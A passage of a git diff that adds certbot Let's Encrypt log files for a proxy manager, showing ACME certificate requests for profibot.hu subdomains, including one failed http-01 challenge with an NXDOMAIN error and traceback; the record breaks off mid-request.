"eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSmhQdFNQMUYyU2dyb096SDg1WWdPT0xONVRqM0IzdmhyejM1bXRha3pzTHciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTA2NzgzOTg2In0", + "signature": "X8K93R3oSnjhIZor6qchuIJMbIqCzZagzUUjcpHjr39S8v-EnWqsTs0T97v9LiVA0frQ3Ywz4bi6rn5F9bkCQxc-kFs5NrBs4_DHYpKcOjMscpUuRRjb4whuhF1dBWWWQ9mH7Jj4HtYPZfpjxc55Qsmg4n8qTDFugAd8tq_ffMEMrUG3670E1YPN39A8TMgfVPUZWWgNrtHKIrQzlAL9HpjU0Xpuc6jAxEBX3Tf6XlQmUNZmqPPrRq1KYTu3kwzsov6Yl2dLA5GqkaE3xyuqhfaPiH4dvZ2DWmUqsWTlSU7oPQYJ22xlBM5_CXjAIRyiXtancc9jFW7TGKKD9OGVRw", + "payload": "" +} +2025-12-24 20:49:55,699:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632506783986 HTTP/1.1" 200 822 +2025-12-24 20:49:55,700:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 20:49:55 GMT +Content-Type: application/json +Content-Length: 822 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: fULB7aUJ4ovs5U-MQBi0rn3a_-3G7UY6MGx-JPrsljBM5hgXZ_c +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "pending", + "expires": "2025-12-31T20:49:55Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632506783986/9MfOKQ", + "status": "pending", + "token": "DXVxT7DREnhAE3aC7VHEAWBzyVErdonLVXWFR1ImaOg" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632506783986/6NKP9g", + "status": "pending", + "token": "DXVxT7DREnhAE3aC7VHEAWBzyVErdonLVXWFR1ImaOg" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632506783986/sTLlGg", + "status": "pending", + "token": "DXVxT7DREnhAE3aC7VHEAWBzyVErdonLVXWFR1ImaOg" + } + ] +} +2025-12-24 20:49:55,701:DEBUG:acme.client:Storing nonce: fULB7aUJ4ovs5U-MQBi0rn3a_-3G7UY6MGx-JPrsljBM5hgXZ_c +2025-12-24 20:49:55,701:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632506783986/9MfOKQ', 'status': 'pending', 'token': 'DXVxT7DREnhAE3aC7VHEAWBzyVErdonLVXWFR1ImaOg'} +2025-12-24 20:49:55,702:INFO:certbot._internal.auth_handler:Performing the following challenges: +2025-12-24 20:49:55,702:INFO:certbot._internal.auth_handler:http-01 challenge for db.profibot.hu +2025-12-24 20:49:55,703:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2025-12-24 20:49:55,703:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2025-12-24 20:49:55,705:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/DXVxT7DREnhAE3aC7VHEAWBzyVErdonLVXWFR1ImaOg +2025-12-24 20:49:55,705:DEBUG:acme.client:JWS payload: +b'{}' +2025-12-24 20:49:55,706:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632506783986/sTLlGg: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSjRvdnM1VS1NUUJpMHJuM2FfLTNHN1VZNk1HeC1KUHJzbGpCTTVoZ1haX2MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjMyNTA2NzgzOTg2L3NUTGxHZyJ9", + "signature": "ZikfTQF93glLuWXiQ2ttX65huL-bZob8LHZ8tqHUcz_mG80qD0g3rzn9n2smCHv2mb7xPtOY5RiuMMSfQPT7s3n-lHtjDSIrArjCq5PEJJOm2P2ky3oMlGaeladNN4wbm2FBIL29leFfRkVfIt0vAznjLkQjGlkXbTHYBkb82TVrV_VIosuIfkaXjZPco91i_xrfSMbyR0DfYJYYyk3fMJ7XanbkfVCzPgA7BCXOw8vqsKmDEKZjxyI7l2H5ropXfrcoQcEq9eCewlbIdbOtWJP-BGrnv3S0Nu0C0782OaQkVzQkTNm11ue4sKPcvqpIcp9-lH1Oynmh6lSOVkKK4g", + "payload": "e30" +} +2025-12-24 20:49:55,918:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/632506783986/sTLlGg HTTP/1.1" 200 195 +2025-12-24 20:49:55,919:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 20:49:55 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632506783986/sTLlGg +Replay-Nonce: fULB7aUJrhJVm2KXxiIq4ojIKPg2rDy--W66k6s7Xeq3qKFbyW4 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632506783986/sTLlGg", + "status": "pending", + "token": "DXVxT7DREnhAE3aC7VHEAWBzyVErdonLVXWFR1ImaOg" +} +2025-12-24 20:49:55,919:DEBUG:acme.client:Storing nonce: fULB7aUJrhJVm2KXxiIq4ojIKPg2rDy--W66k6s7Xeq3qKFbyW4 +2025-12-24 20:49:55,919:INFO:certbot._internal.auth_handler:Waiting for verification... +2025-12-24 20:49:56,920:DEBUG:acme.client:JWS payload: +b'' +2025-12-24 20:49:56,924:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/632506783986: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJmVUxCN2FVSnJoSlZtMktYeGlJcTRvaklLUGcyckR5LS1XNjZrNnM3WGVxM3FLRmJ5VzQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjMyNTA2NzgzOTg2In0", + "signature": "kRZbDyjZoCjFMXnwSyi10E73aD9H7ke6wwqDAX6B3e9F7KNzcOiAjb89SnPjLYjA3LSRgps5Iy9TI7g7LmFM6_FKBGBE729aDUnAp-klBFe2em7BOfmIRtPwwIz24nIyK5MjR1752CDmsRb09jCyvVARIfqGblidwVDTzh4H_p8_f9dZYXIUIwOAUd9LbP7sS78hFLQLbuDpjWxiWUzPDm5L5EJdfptYorlk_kcdF2mdPmVpX9SOkwsptGBgAUcnvwcJoxjJ0gQ0erJutYw9bMsZ3ZHyZg8vboOWPW1R4S0FEtkZM5wxmUY2FgL_30618ac7p4qWYcATP3o08B8bRw", + "payload": "" +} +2025-12-24 20:49:57,081:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/632506783986 HTTP/1.1" 200 749 +2025-12-24 20:49:57,082:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Wed, 24 Dec 2025 20:49:57 GMT +Content-Type: application/json +Content-Length: 749 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: 58tS3qjEC3crQjIzj-AACFKFIf7JpLwdnMc7rupc2nYtYeyLrnM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "db.profibot.hu" + }, + "status": "invalid", + "expires": "2025-12-31T20:49:55Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/632506783986/sTLlGg", + "status": "invalid", + "validated": "2025-12-24T20:49:55Z", + "error": { + "type": "urn:ietf:params:acme:error:dns", + "detail": "DNS problem: NXDOMAIN looking up A for db.profibot.hu - check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for db.profibot.hu - check that a DNS record exists for this domain", + "status": 400 + }, + "token": "DXVxT7DREnhAE3aC7VHEAWBzyVErdonLVXWFR1ImaOg" + } + ] +} +2025-12-24 20:49:57,082:DEBUG:acme.client:Storing nonce: 58tS3qjEC3crQjIzj-AACFKFIf7JpLwdnMc7rupc2nYtYeyLrnM +2025-12-24 20:49:57,083:INFO:certbot._internal.auth_handler:Challenge failed for domain db.profibot.hu +2025-12-24 20:49:57,083:INFO:certbot._internal.auth_handler:http-01 challenge for db.profibot.hu +2025-12-24 20:49:57,084:DEBUG:certbot._internal.display.obj:Notifying user: +Certbot failed to authenticate some domains (authenticator: webroot). The Certificate Authority reported these problems: + Domain: db.profibot.hu + Type: dns + Detail: DNS problem: NXDOMAIN looking up A for db.profibot.hu - check that a DNS record exists for this domain; DNS problem: NXDOMAIN looking up AAAA for db.profibot.hu - check that a DNS record exists for this domain + +Hint: The Certificate Authority failed to download the temporary challenge files created by Certbot. Ensure that the listed domains serve their content from the provided --webroot-path/-w and that files created there can be downloaded from the internet. + +2025-12-24 20:49:57,084:DEBUG:certbot._internal.error_handler:Encountered exception: +Traceback (most recent call last): + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. + +2025-12-24 20:49:57,084:DEBUG:certbot._internal.error_handler:Calling registered functions +2025-12-24 20:49:57,085:INFO:certbot._internal.auth_handler:Cleaning up challenges +2025-12-24 20:49:57,085:DEBUG:certbot._internal.plugins.webroot:Removing /data/letsencrypt-acme-challenge/.well-known/acme-challenge/DXVxT7DREnhAE3aC7VHEAWBzyVErdonLVXWFR1ImaOg +2025-12-24 20:49:57,085:DEBUG:certbot._internal.plugins.webroot:All challenges cleaned up +2025-12-24 20:49:57,085:DEBUG:certbot._internal.log:Exiting abnormally: +Traceback (most recent call last): + File "/opt/certbot/bin/certbot", line 7, in + sys.exit(main()) + ^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/main.py", line 18, in main + return internal_main.main(cli_args) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1850, in main + return config.func(config, plugins) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 1562, in certonly + lineage = _get_and_save_cert(le_client, config, domains, certname, lineage) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/main.py", line 141, in _get_and_save_cert + lineage = le_client.obtain_and_enroll_certificate(domains, certname) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 526, in obtain_and_enroll_certificate + cert, chain, key, _ = self.obtain_certificate(domains) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 427, in obtain_certificate + orderr = self._get_order_and_authorizations(csr.data, self.config.allow_subset_of_names) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/client.py", line 505, in _get_order_and_authorizations + authzr = self.auth_handler.handle_authorizations(orderr, self.config, best_effort) + ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 104, in handle_authorizations + self._poll_authorizations(authzrs, max_retries, max_time_mins, best_effort) + File "/opt/certbot/lib/python3.11/site-packages/certbot/_internal/auth_handler.py", line 208, in _poll_authorizations + raise errors.AuthorizationError('Some challenges have failed.') +certbot.errors.AuthorizationError: Some challenges have failed. +2025-12-24 20:49:57,087:ERROR:certbot._internal.log:Some challenges have failed. diff --git a/proxy-manager/data/logs/letsencrypt.log.19 b/proxy-manager/data/logs/letsencrypt.log.19 new file mode 100755 index 0000000..e69de29 diff --git a/proxy-manager/data/logs/letsencrypt.log.2 b/proxy-manager/data/logs/letsencrypt.log.2 new file mode 100755 index 0000000..1381d24 --- /dev/null +++ b/proxy-manager/data/logs/letsencrypt.log.2 @@ -0,0 +1,1368 @@ +2026-01-27 23:19:22,732:DEBUG:certbot._internal.main:certbot version: 5.1.0 +2026-01-27 23:19:22,732:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot +2026-01-27 23:19:22,732:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-17', '--agree-tos', '--authenticator', 'webroot', '-m', 'kincses@gmail.com', '--preferred-challenges', 'http', '--domains', 'terminal.profibot.hu'] +2026-01-27 23:19:22,732:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) +2026-01-27 23:19:22,746:DEBUG:certbot._internal.log:Root logging level set at 30 +2026-01-27 23:19:22,747:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None +2026-01-27 23:19:22,747:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot +Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). +Interfaces: Authenticator, Plugin +Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') +Initialized: +Prep: True +2026-01-27 23:19:22,747:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None +2026-01-27 23:19:22,747:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None +2026-01-27 23:19:22,790:DEBUG:certbot._internal.main:Picked account: +2026-01-27 23:19:22,791:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. +2026-01-27 23:19:22,793:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 +2026-01-27 23:19:23,235:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 +2026-01-27 23:19:23,236:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:23 GMT +Content-Type: application/json +Content-Length: 1033 +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "TjMk-AEmEog": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", + "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", + "meta": { + "caaIdentities": [ + "letsencrypt.org" + ], + "profiles": { + "classic": "https://letsencrypt.org/docs/profiles#classic", + "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", + "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", + "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" + }, + "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", + "website": "https://letsencrypt.org" + }, + "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", + "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", + "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", + "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", + "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" +} +2026-01-27 23:19:23,237:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for terminal.profibot.hu +2026-01-27 23:19:23,258:DEBUG:acme.client:Requesting fresh nonce +2026-01-27 23:19:23,259:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. +2026-01-27 23:19:23,402:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 +2026-01-27 23:19:23,402:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:23 GMT +Connection: keep-alive +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKgSpfmjVTAlr6OwHqqoMRy42sq_WI2C0BIC9ftye_HkNs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + + +2026-01-27 23:19:23,403:DEBUG:acme.client:Storing nonce: z6o3uXKgSpfmjVTAlr6OwHqqoMRy42sq_WI2C0BIC9ftye_HkNs +2026-01-27 23:19:23,403:DEBUG:acme.client:JWS payload: +b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "terminal.profibot.hu"\n }\n ]\n}' +2026-01-27 23:19:23,415:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ1NwZm1qVlRBbHI2T3dIcXFvTVJ5NDJzcV9XSTJDMEJJQzlmdHllX0hrTnMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", + "signature": "a5dutotjG4f4CNS0HmqMVyz8kK6HAvyc0BTrw9zx_coTsgbrVHYup6LZRM3EXLEGbBTHwjI2S-c-twNXVe2Ooos4HMFMjtEi-CWd9rKKAm8EE6GJOeJG1HQfUT_3er105aDFa0IQURBKqidlbLfvDPQxK06PBINTzfr1MpfFaFgJmjEqlGe2mLc1R8k-o5q9ScLr9viW9NFo-P3jTwtkb3LOVzfDjGRpnICOCBZb_as7hTjHVvQ0Zp-ZfY7Cj5i_8ZdBa5ZhN-K05rEGrp0ulJJZuXD2tgXINOf4gkYBk7awBrtE7TT5a6nfVQAoJHasMTEsoOOEwW9DmRh6mgY-tw", + "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogInRlcm1pbmFsLnByb2ZpYm90Lmh1IgogICAgfQogIF0KfQ" +} +2026-01-27 23:19:23,681:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 354 +2026-01-27 23:19:23,682:DEBUG:acme.client:Received response: +HTTP 201 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:23 GMT +Content-Type: application/json +Content-Length: 354 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Location: https://acme-v02.api.letsencrypt.org/acme/order/2906438176/474148345596 +Replay-Nonce: z6o3uXKgFuzjf2tkb7R1LdEz5JdJXi0Cp4PminoJ86yqW81HxUc +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "identifiers": [ + { + "type": "dns", + "value": "terminal.profibot.hu" + } + ], + "authorizations": [ + "https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386" + ], + "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/2906438176/474148345596" +} +2026-01-27 23:19:23,682:DEBUG:acme.client:Storing nonce: z6o3uXKgFuzjf2tkb7R1LdEz5JdJXi0Cp4PminoJ86yqW81HxUc +2026-01-27 23:19:23,683:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:23,685:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ0Z1empmMnRrYjdSMUxkRXo1SmRKWGkwQ3A0UG1pbm9KODZ5cVc4MUh4VWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "hAHyrYBCCgT3S8TMTxN2ni7CiOSz3PNG1UwHmhiEgDdzTBX5Qbj8RcRO4Ubgs-9t67wKKurep69xv49Qn-s6Den6_YjlQch7c3_pA57sTkaEJwryLlUJUa537i1GiSg1v0d1YBxcByTFqFm8Y0vgGXwbtZ2so4FOhvhKUIywzx4hBiRec_MY4DdODJVGmX0E6G97z2dvo6m58IWFFH5FjF8FA7m1W2L7tNodMmBAlqM5bawbqdPwpbCe6e_il0HIIHwY0lWtQiPaBzfhTw47ggSy9-BHMTcC9ATIdYyukxN0zU0ueHDIBnHLdJhvg4Uwg0iahwy8wE51CjvHkXnATg", + "payload": "" +} +2026-01-27 23:19:23,843:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:23,844:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:23 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlblpg5itcV1dX6w2nMh5o6QmyktllBcQz_Qs8Cp4nl3Y +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:23,844:DEBUG:acme.client:Storing nonce: F4vGLPjlblpg5itcV1dX6w2nMh5o6QmyktllBcQz_Qs8Cp4nl3Y +2026-01-27 23:19:23,845:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:23,845:INFO:certbot._internal.auth_handler:Performing the following challenges: +2026-01-27 23:19:23,846:INFO:certbot._internal.auth_handler:http-01 challenge for terminal.profibot.hu +2026-01-27 23:19:23,846:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. +2026-01-27 23:19:23,847:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge +2026-01-27 23:19:23,849:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w +2026-01-27 23:19:23,850:DEBUG:acme.client:JWS payload: +b'{}' +2026-01-27 23:19:23,853:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbGJscGc1aXRjVjFkWDZ3Mm5NaDVvNlFteWt0bGxCY1F6X1FzOENwNG5sM1kiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2LzNMajVSZyJ9", + "signature": "BHhodnIGDhZ6haAaop4ktB4Zs9iT09-tO2r4Hv6mCvq6rwsY4H92Tip-8jkcehJ1m2Cgm1ULiRYYWGFIPE9m18PDzkpCqwQNj8tDwWYi5VgPI4-6znIFOYtAGuUJ8xMPsp2jQ2-owMtKgvNoi_9irAoFi8AfOUXlm1QPyRSrvJrW6IdLPZNDdXt0OWX2kr3UcpLLuXSV5hiDa9_WqFVLJ1giv_myFtzWZdBC4O-59Rjr5i4GC-XlG3MR8VGaPi7uXF1u8pxX213DKgUYmL4IZiszkBTbsGyUR6iyQswoNFBJ8PniW4F9tjxD70Cg-8MLPQspvPcz5knbDXSq9MuilQ", + "payload": "e30" +} +2026-01-27 23:19:24,002:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/2906438176/649788427386/3Lj5Rg HTTP/1.1" 200 195 +2026-01-27 23:19:24,003:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:23 GMT +Content-Type: application/json +Content-Length: 195 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index", ;rel="up" +Location: https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg +Replay-Nonce: F4vGLPjlbA3KCgJ9NNzZFTz1jV2FYwSrmftwxkNGQtkSKx2yIJ8 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" +} +2026-01-27 23:19:24,004:DEBUG:acme.client:Storing nonce: F4vGLPjlbA3KCgJ9NNzZFTz1jV2FYwSrmftwxkNGQtkSKx2yIJ8 +2026-01-27 23:19:24,004:INFO:certbot._internal.auth_handler:Waiting for verification... +2026-01-27 23:19:25,005:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:25,009:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbGJBM0tDZ0o5Tk56WkZUejFqVjJGWXdTcm1mdHd4a05HUXRrU0t4MnlJSjgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": 